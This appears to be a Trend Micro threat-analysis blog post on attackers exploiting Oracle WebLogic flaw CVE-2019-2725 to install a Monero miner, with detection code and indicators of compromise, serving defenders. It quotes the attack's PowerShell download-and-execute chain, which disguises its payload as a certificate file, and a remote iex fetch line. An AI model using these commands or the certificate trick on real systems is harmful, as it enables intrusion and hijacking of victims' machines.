CVE-2019-2725 Exploited and Certificate Files Used for Obfuscation to Deliver Monero Miner

by Mark Vicente, Johnlery Triunfante, and Byron Gelera

In April 2019, a security advisory was released for CVE-2019-2725, a deserialization vulnerability involving the widely used Oracle WebLogic Server. Soon after the advisory was published, reports emerged on the SANS ISC InfoSec forums that the vulnerability was already being actively exploited to install cryptocurrency miners. We managed to confirm these reports after feedback from the Trend Micro™ Smart Protection Network™ security architecture revealed similar cryptocurrency-mining activity involving the vulnerability, but with an interesting twist: the malware hides its malicious code in certificate files as an obfuscation tactic.

Infection chain

 Figure 1. The infection chain

Installation routine

After arriving on the target machine, the malware will exploit CVE-2019-2725 to execute the following command:

“powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer (New-Object Net.WebClient).DownloadString(‘hxxp://45.32.28.187:1012/cert.cer’); certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & start /b cmd /c del %APPDATA%cert.cer”

The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).

It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file. The decoded file is then saved as %APPDATA%update.ps1.

The newly created update.ps1 (Trojan.PS1.MALXMR.MPA) file is then executed using PS before the downloaded cert.cer file is deleted using cmd.
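The routine above leaves a recognizable trail in process-creation logs: CertUtil decoding to a script extension, the decoded file then run with PowerShell, and abbreviated, mixed-case PowerShell parameters. The following detection sketch is an added example, not code from the original article; the finding names, the extension list and the benign samples are assumptions made for illustration.

```python
import re

SCRIPT_EXT = {".ps1", ".bat", ".cmd", ".vbs", ".js", ".exe", ".dll"}
DECODE_RE = re.compile(r"certutil(?:\.exe)?\s+[-/]decode\s+(\S+)\s+(\S+)", re.I)
PARAM_RE = re.compile(r"-(\w+)\s+(\w+)")
FILE_RE = re.compile(r"-f(?:ile)?\s+(\S+)", re.I)

# The command quoted in the article (defanged URL kept as published).
ARTICLE_CMD = (
    "powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer "
    "(New-Object Net.WebClient).DownloadString(‘hxxp://45.32.28.187:1012/cert.cer’); "
    "certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c "
    "powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & "
    "start /b cmd /c del %APPDATA%cert.cer"
)
# Constructed benign command lines for contrast.
BENIGN = [
    "certutil -decode request.b64 request.cer",
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
]


def ps_flags(cmd):
    """Resolve abbreviated, mixed-case powershell.exe parameters to findings."""
    found = set()
    for name, value in PARAM_RE.findall(cmd):
        name, value = name.lower(), value.lower()
        # PowerShell accepts any unambiguous prefix of a parameter name.
        if "windowstyle".startswith(name) and value == "hidden":
            found.add("hidden-window")
        if ("executionpolicy".startswith(name) or name == "ep") and value == "bypass":
            found.add("execution-policy-bypass")
    return found


def analyze(cmd):
    """Return the sorted list of findings for one logged command line."""
    findings = ps_flags(cmd)
    decoded = set()
    for _src, dst in DECODE_RE.findall(cmd):
        ext = dst[dst.rfind("."):].lower() if "." in dst else ""
        if ext in SCRIPT_EXT:          # a certificate decode should not yield a script
            findings.add("certutil-decode-to-script")
            decoded.add(dst.lower())
    if any(path.lower() in decoded for path in FILE_RE.findall(cmd)):
        findings.add("decoded-file-executed")
    if re.search(r"downloadstring\s*\(", cmd, re.I):
        findings.add("powershell-download")
    return sorted(findings)
```
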

When we downloaded the certificate file, we noticed that it looked like a normal Privacy-Enhanced Mail (PEM) format certificate.

 Figure 2. The downloaded certificate file

However, upon decoding the base64 content, we found that, instead of the commonly used X.509 TLS file format, it actually comes in the form of the following PS command:

iex(New-Object Net.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

One interesting characteristic of the downloaded certificate file is that it must be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once. There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.
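A file can carry PEM certificate headers while its base64 body decodes to script text instead of DER, possibly under more than one base64 layer as observed above. The triage check below is an added example, not code from the original article: it tests whether the decoded body has the outer shape of an X.509 certificate (a single DER SEQUENCE) and otherwise counts how many base64 layers wrap a text payload. The verdict names and the samples are constructed for illustration.

```python
import base64
import binascii
import re

PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
MAX_LAYERS = 4  # assumption: stop peeling nested base64 after a few layers

def is_der_sequence(blob):
    """True if the outer TLV is a SEQUENCE whose length covers the whole blob."""
    if len(blob) < 2 or blob[0] != 0x30:
        return False
    if blob[1] < 0x80:                                  # short-form length
        return len(blob) == 2 + blob[1]
    n = blob[1] & 0x7F                                  # long form: n length octets
    if not 1 <= n <= 4 or len(blob) < 2 + n:
        return False
    return len(blob) == 2 + n + int.from_bytes(blob[2:2 + n], "big")

def printable(blob):
    return bool(blob) and all(32 <= c < 127 or c in (9, 10, 13) for c in blob)

def classify_pem(text):
    """Return (verdict, base64_layers) for the first CERTIFICATE block in text."""
    m = PEM_RE.search(text)
    if not m:
        return ("no-pem-block", 0)
    data, layers = m.group(1).encode("ascii", "replace"), 0
    while layers < MAX_LAYERS:
        try:
            decoded = base64.b64decode(b"".join(data.split()), validate=True)
        except (binascii.Error, ValueError):
            break
        if layers and not printable(decoded):
            break                    # inner text only resembled base64; keep it as text
        data, layers = decoded, layers + 1
        if not printable(data):
            break
    if layers == 1 and is_der_sequence(data):
        return ("der-sequence", 1)
    if layers and printable(data):
        return ("text-payload", layers)
    return ("not-a-certificate", layers)

def make_pem(raw):
    body = base64.b64encode(raw).decode()
    return f"-----BEGIN CERTIFICATE-----\n{body}\n-----END CERTIFICATE-----\n"

# Constructed samples: a DER-shaped stub, and a harmless script base64-encoded twice.
DER_STUB = make_pem(bytes([0x30, 0x03, 0x02, 0x01, 0x01]))
DOUBLE = make_pem(base64.b64encode(b"Write-Output 'constructed sample'"))
```

A `text-payload` verdict on a file served or saved as `.cer` is worth an alert on its own; a layer count above 1 matches the double encoding described in this section.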

The cryptocurrency miner payload

The PS command from the certificate file downloads and executes another PS script in memory. This script will then download and execute the following files:

File                  Details
Sysupdate.exe         Monero (XMR) miner payload
Config.json           The config file for the XMR miner
Networkservice.exe    Possibly used for the propagation and exploitation of WebLogic
Update.ps1            The PS script in memory
Sysguard.exe          Serves as the watchdog for the miner process
Clean.bat             Deletes other components

The update.ps1 file containing the decoded certificate file is then replaced with the new update.ps1. This is followed by the creation of a scheduled task that will execute the new update.ps1 every 30 minutes.

Certificate files as an obfuscation technique

The idea of using certificate files to hide malware is not a new one: a proof of concept was introduced late last year by Sophos in which they demonstrated placing an Excel file with an embedded macro inside a certificate file. If any actual incidents have been found, they are probably few. By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal, especially when establishing HTTPS connections.

However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier. This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.

Oracle has already released an update that addresses CVE-2019-2725. Thus, it is highly recommended for organizations that use WebLogic Server to update their software to the latest version to prevent any attacks that exploit the vulnerability from affecting their businesses.

Trend Micro solutions

Trend Micro endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and blocking all related malicious URLs. Enterprises can also monitor all ports and network protocols for advanced threats and be protected from targeted attacks with the Trend Micro Deep Discovery™ Inspector network appliance.

Deep Discovery Inspector protects customers from these threats via this DDI Rule:

  • DDI Beta Rule 3783: Possible Oracle Weblogic Remote Command Execution Exploit – HTTP (Request) – Beta

Furthermore, Trend Micro Deep Security and Vulnerability Protection protect user systems from threats via the following DPI rule:

  • 1009707-Oracle Weblogic Server Remote Code Execution Vulnerability (CVE-2019-2725)

Trend Micro™ TippingPoint® customers are protected from threats and attacks that may exploit this vulnerability via the following MainlineDV filter:

  • HTTP: Oracle WebLogic Server Remote Code Execution Vulnerability

Indicators of Compromise (IoCs)

Details             Hashes (SHA-256)                                                    Detection Name
sysguard.exe-upx    e4bc026aec8a76b887a8fc48726b9c48540fc2aa76eb8e61893da2ee6df6ab3a    TROJ_GEN.R002C0GDM19
sysupdate.exe       4b9842b6be35665174c78c3e4063c645bd6e10eb333f68e4c7840fe823647bdf    Coinminer.Linux.MALXMR.UWEJI
update.ps1          c30f42e6f638f3e8218caf73c2190d2a521304431994fd6efeef523cfbaa5e81    Trojan.PS1.MALXMR.MPA
cert.cer            3a567b7985b2da76db5e5a1d5554f7c13f375d88a27d6e6d108ad79e797adc9a    Coinminer.Win32.MALXMR.TIAOODCJ.component

This post appeared first on Trend Micro Blog
Author: Trend Micro